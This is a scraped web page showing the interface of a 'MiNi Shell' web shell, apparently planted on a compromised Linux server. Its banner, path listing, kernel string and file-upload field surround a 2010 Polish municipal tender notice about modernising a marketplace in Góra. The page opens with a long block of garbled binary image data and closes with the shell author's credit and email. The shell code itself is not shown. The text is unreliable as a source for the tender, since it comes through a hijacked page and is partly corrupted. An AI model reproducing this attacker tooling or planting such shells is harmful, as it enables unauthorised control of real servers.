JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101125/336095-N-2010.html

<p class="kh_header"><b>Góra: Opracowanie dokumentacji projektowo- kosztorysowej dla zadania inwestycyjnego p.n.,, Modernizacja targowiska w m. Góra,,.</b><br>
<b>Numer ogłoszenia: 336095 - 2010; data zamieszczenia: 25.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Góra , ul. Mickiewicza 1, 56-200 Góra, woj. dolnośląskie, tel. 065 5443644, faks 065/543-26-58.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gora.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowo- kosztorysowej dla zadania inwestycyjnego p.n.,, Modernizacja targowiska w m. Góra,,..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie dokumentacji projektowej wraz z uzyskaniem decyzji o pozwoleniu na budowę, specyfikacji technicznych wykonania i odbioru robót  oraz sporządzenia kosztorysu inwestorskiego. Niniejsze opracowania posłużą do    przeprowadzenia postępowania w trybie ustawy Prawo zamówień publicznych ( t.j. Dz. U. z 2010 r. , Nr 113,  poz. 759 z późn. zm. ) oraz realizacji inwestycji.
Niniejsze opracowania winny czynić zadość obowiązującym przepisom prawa, w szczególności :

Ustawa Prawo zamówień publicznych ( t.j. Dz. U. z 2010 r. , Nr 113,  poz. 759 z późn. zm. )- art. 29 i 30 .

Ustawa Prawo budowlane wraz z przepisami wykonawczymi:
Rozporządzenie Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej , specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. Nr 202, poz. 2072 ze zmianami) .
Rozporządzenie Ministra Infrastrutury z dnia 18 maja 2004 r. w sprawie  określania metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-uzytkowym (Dz. U. Nr 130, poz. 1389).

 Obszar zainwestowania to powierzchnia działki nr ewid. 919 stanowiąca powierzchnię 2106 m2. Modernizacja targowiska ma doprowadzić do powstania stałego miejsca dla prowadzenia handlu.
Wymagania dotyczące zakresu projektowania:

 Dokumentacja projektowa winna obejmować następujące zakresy:
- Demontaż stałego wyposażenia placu targowego w postaci stołów stalowych zadaszonych,
-	Rozbiórka murka okalającego plac od strony południowej i wschodniej,
-	Rozbiórka nawierzchni asfaltowej brukowej,
-	Przycinka dwóch drzew lip, po uzyskaniu zgody Wydziału Gospodarki Komunalnej I Ochrony Środowiska,
-	Demontaż nieczynnych słupów energetycznych,
-	Rozebranie krawężników wyznaczających miejsca parkingowe.
Wykonawca winien w szczególności:
-	Wystąpić w imieniu zamawiającego do dysponenta sieci energetycznej o wydanie zapewnienia dostawy energii elektrycznej dla potrzeb planowanej inwestycji.
-	Wystąpić w imieniu zamawiającego do dysponenta sieci energetycznej o wydanie warunków technicznych przyłączenia do sieci energetycznej.
-	Wystąpić w imieniu zamawiającego do dysponenta sieci kanalizacyjnej o wydanie zapewnienia odbioru ścieków deszczowych.
-	Wystąpić w imieniu zamawiającego do dysponenta sieci kanalizacyjnej o wydanie warunków technicznych odbioru ścieków deszczowych.
-	Uzgodnić opracowaną dokumentację z odpowiednimi dostawcami mediów.
-	Uzgodnić dokumentację z Zespole Uzgadniania Dokumentacji.
-	Opracowanie projektu zagospodarowania terenu,
-	Opracowanie projektu budowlanego w branży budowlanej,
-	Opracowanie projektu budowlanego w branży drogowej,
-	Opracowanie projektu budowlanego w branży instalacji sanitarnych,
-	Opracowanie projektu budowlanego w branży instalacji elektrycznych,
-	Dostarczenie materiałów do Zamawiającego w celu zgłoszenia robót ,
-	pawilonów handlowych ( nowa lokalizacja) , nowa lokalizacja stołów zadaszonych na stałe montowanych, nowa lokalizacja placu parkingowego, nawierzchnia, oświetlenie, odwodnienie, murek okalający wraz z wejściami i  wjazdami , 
Aktualne uwarunkowania wykonania przedmiotu zamówienia.
Do aktualnych uwarunkowań wykonania przedmiotu zamówienia należą:
-	Plac targowy istnieje i funkcjonuje, prowadzi się na nim handel od poniedziałku do soboty włącznie.
-	Plac targowy położony jest w centrum miasta u zbiegu ulic Targowej i Kościuszki.
-	Warunkiem koniecznym do spełnienia jest takie nowe usytuowanie istniejących pawilonów handlowych aby wszystkie dotychczasowe pawilony znalazły nowe miejsce.

Ogólne właściwości funkcjonalno-użytkowe.
Planowana modernizacja placu targowego ma na celu usprawnienie handlu oraz poprawę jakości usług świadczonych przez handlujących. Stałe pawilony handlowe mają zostać pogrupowane i uszeregowane wzdłuż północnej i wschodniej pierzei placu. Środkowa część ma być wyposażona w stałe, trwałe stoły z zadaszeniem do wykładania towarów. Południowa część ma być przeznaczona jako parking i dla handlujących z przestawnych stoisk przy samochodzie. Ponadto planuje się wyposażenie placu w jeden punkt poboru energii elektrycznej zlokalizowany w jego centralnym punkcie.
Teren placu zostanie utwardzony, oświetlony i odwodniony.
Zamiast  ogrodzenia plac należy otoczyć murkiem z cegły pełnej klinkierowej o wys. 60 cm., w którym zlokalizowane będą trzy wejścia piesze oraz jeden wjazd dla samochodów.
Szczegółowe właściwości funkcjonalno-użytkowe wyrażone we wskaźnikach powierzchniowo-kubaturowych.
-	Pawilon sanitarny pozostaje na terenie targowiska bez zmiany lokalizacji ( przy tej kwestii należy zwrócić szczególną uwagę na treść uzgodnienia z WDKZ z dnia 25.03.2010 r.)
-	Należy zdemontować pozostałe istniejące obiekty wyposażenia targowiska w postaci: stałych stołów handlowych, słupów służących jako prowizoryczne podtrzymanie instalacji elektrycznej, tablicy informacyjną, balustrady stalowe wolnostojące.
-	Należy  wyburzyć murek oporowy oddzielający teren targowiska od strony południowej i wschodniej, krawężniki parkingu wewnętrznego oraz pozostałe po pawilonach handlowych podmurówki.
-	Należy zniwelować teren tak aby uzyskać jedną powierzchnię bez progów.
-	Należy wykonać przycinki dwóch drzew lip.
Projekt modernizacji targowiska powinien przewidywać:
-	Odwodnienie, utwardzenie kostką przy pomocy kostki brukowej betonowo- wibroprasowanej typu ,, bruk odrzański ,, gr. 8 cm w kolorze szarym ( w nawiązaniu do rewitalizowanej części miasta- materiał zaakceptowany przez WDKZ), i oświetlenie całego terenu targowiska ( stopień naświetlenia zgodny z właściwymi normami; stylistyka słupów i opraw nawiązująca do nowo wybudowanego oświetlenia w obrębie murów starego miasta - rysunki w załączeniu, ornamentyka patrz. słup classic, materiał i kolorystyka obwarowana m.p.z.p.)
-	Zamawiający posiada aktualną mapę do celów projektowych.
-	Lokalizację jednego ogólnodostępnego punktu poboru energii elektrycznej zaopatrzonego w 6 szt. gniazd 230V z opomiarowaniem poboru energii.
-	Nową lokalizację pawilonów handlowych, wzdłuż północnej i wschodniej granicy działki, w liczbie nie mniejszej niż obecnie istniejących pawilonów (13szt).
-	Nową lokalizację stałych zadaszonych stołów handlowych w liczbie 20szt. w środkowej części placu, wymagania dotyczące stołów wraz z rysunkami z załączeniu.
-	Nowa lokalizację placu parkingowego z wyznaczonymi miejscami parkingowymi w południowej części placu.
-	Otoczenie placu  murkiem o wys. 60 cm.,  z cegły pełnej klinkierowej w którym zlokalizowane będą trzy wejścia piesze oraz jeden wjazd dla samochodów (w miejscu istniejącego)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 01.06.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W postępowaniu nie przewidziano obowiązku wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnia warunek posiadania wiedzy i doświadczenia, jeżeli wykaże iż w badanym okresie wykonał zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył przynajmniej dwie  usługi projektowania, dotyczące obiektów użyteczności publicznej , zakończone uzyskaniem decyzji o pozwoleniu na budowę.
W przypadku Wykonawców występujących wspólnie, warunek spełniają oni wspólnie.
Ocena spełniania warunku odbędzie się przy zastosowaniu formuły spełnia- nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty, wymienione w pkt.6 przedmiotowej SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmiany umowy w zakresie terminów realizacji, jeżeli opóźnienia wynikają z przyczyn obiektywnych,  nie zawinionych przez Wykonawcę lub  uwarunkowanych przez Zamawiającego  . Termin zostanie przedłużony jedynie o czas trwania przeszkody.
Dopuszcza się również zmianę w zakresie rozwiązań narzuconych przez Zamawiającego, jeżeli taka potrzeba wynika z uzgodnień z WDKZ we Wrocławiu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.gora.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Górze, ul. Mickiewicza 1, 56-200 Góra, pokój nr 5.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.12.2010 godzina 12:00, miejsce: Urząd Miasta i Gminy w Górze, ul. Mickiewicza 1, 56-200 Góra, pokój nr 101- sekretariat, I piętro budynku..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com